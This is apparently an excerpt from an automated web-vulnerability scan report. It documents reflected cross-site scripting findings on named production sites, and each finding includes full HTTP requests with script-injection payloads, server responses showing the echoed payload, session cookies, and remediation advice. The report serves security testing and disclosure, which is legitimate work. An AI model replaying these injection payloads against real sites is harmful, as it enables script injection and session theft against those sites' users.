GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs42e41</script><script>alert(1)</script>a2217655438= HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:42:03 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUx6oW8tRuC50eDPRl97npFuaGOMHZn11NBeN10rkeSZPQgfvVRx_vSuEVGvGk0mz1YIl66klbzDAz4DZ182Z1g2kuAlaPwudchWaGV0lrblKY0vtyrTDDdJ79GQdJGzc8AyEa7pPjYaY2Zu0yuUACJsF%7EJtE%7EioMbnns6N4y50a8cshftqy6qCLau3o8Zwemiu0KpfY0iRiilrQMFwJWssTx%7EYINE1554YiykSPZP7F0IBDazYu6U3ycZMVMfr0QLbP5KPEGQ_vEeZLeda09%7EVPWRykFc8y_ukjAbGNAMFht1JGBgjah0G2TUgQ0nSW75STNcK4H4AQoYJV7UCGSR79sTFZIQONMSPahHDaYJfXgZKzZxTmdV_GJ8hU5tlHR04ytmnxPNqwFRehwSL0RTPnZG3thL%7EVHjHZV56Eb_V85eqHkXObQD0Zm0p10961KoojryKWDSFgzM2niBSNac0fLu7K4LulL54z_WGQJduoFwvteqHRIwoYdAobOou2EW%7ExQ4oFScfPE%21; path=/; httponly RNT-Time: D=118859 t=1296697323108634 RNT-Machine: 01 F5_do_compression: yes Keep-Alive: timeout=15, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 25359
3.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3aa72</script><script>alert(1)</script>2ea59d67104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?3aa72</script><script>alert(1)</script>2ea59d67104=1 HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:41:08 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUgRprfxgIlvq96duxnob3hvBaWfagsAGz590%7E%7EFQxYvj6_1w_6mEciwlljmE7zfJtLqRlvR8xervxxoGDYYqCbw4kPUBcZEFoZRmrZw8QTqh4Q3urBb47qoF3Tui%7EDMuuA8SW6x111R8MaPvDpqWLDXbH2fjE%7EjAQJy%7EjpssYasVZ6HH79id9iSiVkOhJWhsMfM4PF1Frjy3wyBiwGBVx8ENPxA2o1dJ0ebJPuv5%7EJLSu504MoxpXxUSQUXU%7EseRXqvR9FJr7oB15DwsOl4WjzTn0NPd0rGO3Fas0MnPCVz9jhd8VYKFNvqPkw9jFjGI5RxmfMPs1cmyuG3nobRb1T%7EEeNs7LFMydaVYBQOOEVJ6jaF1Re9n%7EAnssEQJc50mpLkTRawP6ipl92XTouSftSuWnhiHv2QavJLs2kQPIo4CwPpvMympk9qYSFcWtVh1AzWTOSuaIE967DBi4q0x4h7xmtPl28r4A2IvoxYQCn8Q6%7E7%7EmD%7E3OVgp4HNwqM%7EBqbGGyF1_k2hY%21; path=/; httponly RNT-Time: D=104396 t=1296697268034941 RNT-Machine: 06 F5_do_compression: yes Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 25362
The value of the nsextt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547e6</script><script>alert(1)</script>cf48e18b39c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: arbor.custhelp.com Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:41:09 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUwXGkB0Q%7EkeN19jaCuImlCbnetW3JO6vRIsg9G5758NlYVaItvU5XjD2ZiX_NiVtKaJDalprrVLj6qlLlDnCI6%7Ejjft3YUnrhb1XA3YpbzwIDJ2F2nssc9F%7E_hnpNzWrw2Dt6CUNXAlY07awZQXpFjnrQoevYbR6hnrOq3wMaN9CfgNv1vGgvLQihsfZk4%7EXk_O9C4jhvJQaDoSUVbklHFGqWJ8Ap%7EA2lWYLgQn7Dj7wu5qJSZymKIh2kaAalN_A3S_oJHJCb%7EeyuIvKrxyUp17gHHKbPNbbV6LCP%7E_JdHcR19nH3J2LrLihYSYy9OqJzfMyriuylyjc%21; path=/; httponly RNT-Time: D=114429 t=1296697269254262 RNT-Machine: 04 F5_do_compression: yes Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 27211
The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload 607f7<script>alert(1)</script>42eba27e39e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000002)%3C/script%3E607f7<script>alert(1)</script>42eba27e39e HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: arbor.custhelp.com Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:41:10 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUAaKWBZ7SvvLxWfp%7EcIQfh7mPnrXi9vTZtK7WkhczqL64yYHQ0QVbkK9RHgawNIjpSCmM0Aeaz122bTrt9oxrYqquIIWDHxoUwafbHRYXpZAj8zBo%7EGLua8qDJQ%7EDYr_BEjDeAjfYtPNjYUGrMUjxkR8PpaOpu3f89vemdlgHGnpoJdFLQxsk675FBV9YqReWb3GFGXX4XBah%7EsnYmD_7SyBdqQzd3Zhql7OBAN1jNOgrekoiQBj_XTw6WLuYQmIdNS_1rGasg88i67O%7E9NukjSidUHv2Jl6I7jQxN%7EqKfSPkOD4ngpoXsEKphUlebl6j_XbSJbRExJ716aGgyN_ZtzCyzQ80dbPwgc7f72dHNu4lA3QTPUPqrVQ5_GsqIpIuQPssVxGn6wl0x3yl1rK6szqG50WB0gAY0_rSruLJlE4Xu%7EmXXJ1_cw%21%21; path=/; httponly RNT-Time: D=108020 t=1296697270345051 RNT-Machine: 03 F5_do_compression: yes Keep-Alive: timeout=15, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 27261
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b76</script><script>alert(1)</script>ea583b6f0d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:43 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUgQICmvl2w6Zo2Xi_Jx0N0VgOcbGCC8QFItCAw06VgCz3Mt4%7EGAGfyU2M%7EjB2xMg5ggHpohXV5l5rqv0jWjfN%7EJ%7E72QklUZuENaYBg1WZ4GK77t_VnZJ9ePgqpdt5qpmFeuVSPOvtFdMPJ16uULvibY1%7EVSLYegwJMunUEB4cMQWgeozPB1RX4bpdRmJfNGNYSMipIi5%7ELSfhHdeViZe0S5UhkGq95Iv1vFhIT1B7QKMrn3gv7A%7EiAr7QuieTdfnGa4tw8OQ1cUu8geqVTV4DvFNfsS4YL%7E4vTYnBb8lxnsVeT%7EC5MhQgL0Boz096TdGlDBIUF18UGjd55MRhW9CHmDXXNObd_wZ%7E; path=/; httponly Content-Length: 25622 RNT-Time: D=131773 t=1296691423739902 RNT-Machine: 07 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c521</script><a>a4238952955 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:48 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUl5Nj4RPJmKrK0ec4KoYcZ74WET9xduFZF8XJhcIYWFDJvt8YVPg5PiixPRy5Sn%7Ehiidpu8t9H6PgtJWmiJjeDFhqdz2g4M6rZvKVoR3cwoU%7EA3cXzprLyv6lvudmE_MqxYdg0wnBtp0VjGBkouhpp2g8RrZCMvI7C8uRKHyHdrhjYuH3jeP_vuoouEl7b4xlfWmNRvdchpWhQ9wzT4Bz4fIiibRbgmiM; path=/; httponly Content-Length: 25600 RNT-Time: D=113558 t=1296691428704362 RNT-Machine: 03 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f27fe%3balert(1)//63b819cf766 was submitted in the BT_PID parameter. This input was echoed as f27fe;alert(1)//63b819cf766 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/s/?BT_PID=285777f27fe%3balert(1)//63b819cf766&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 22:01:37 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: ATV1=43499dU6T3Hc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701370249&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ASB1=TX=1296684097&Pb=0&A=8&SID=077E13A179464CC6B65ADCF24D55BF62&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=2B636B63D42641EFBEA212DDAB2EF869; path=/ Date: Wed, 02 Feb 2011 22:01:37 GMT Connection: close Content-Length: 2725
var bt_ad_content285777f27fe;alert(1)//63b819cf766=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack.com.edgesuite.net/asset ...[SNIP]...
3.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://citi.bridgetrack.com
Path:
/a/s/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc3b"%3balert(1)//132759f788 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9dc3b";alert(1)//132759f788 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com&9dc3b"%3balert(1)//132759f788=1 HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 22:01:48 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: ASB9=TX=1296684109&Pb=0&A=8&SID=DD8583ED0D2F43239CBC136CC3E1C6DE&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79292&Cr=98462&W=41062&Tr=41062&Cp=4112&P=285777&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701480650&S2=98462z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ATV9=33820dU6T3Tc1c40Gc8N2Hccc304Uc2DDScc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=4E30CB4C3E0A4790B2D6A833F5FD8992; path=/ Date: Wed, 02 Feb 2011 22:01:47 GMT Connection: close Content-Length: 2739
var bt_ad_content285777=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack ...[SNIP]... net/assets/98459/CITI_PlatVCR_SpecialOffer_688x153_18m_jan11.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=249747&BT_SID=101521&_u=visitor&9dc3b";alert(1)//132759f788=1&_d=http%3A%2F%2Fwww%2Eciti%2Ecom";var lf="lid=&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D249747%26BT%5FSID%3D101521%26%5Fu%3Dvisitor%269dc3b%22%3Balert ...[SNIP]...
3.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b66"-alert(1)-"9daffae2531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85e9a'><script>alert(1)</script>5b968c91723 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8785"-alert(1)-"f79d44465d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfadb'><script>alert(1)</script>b8e6b27f29e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e?_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'> ...[SNIP]...
3.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7c05"-alert(1)-"4172e4c7f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1"; ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a214f'><script>alert(1)</script>6b477eb9bf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
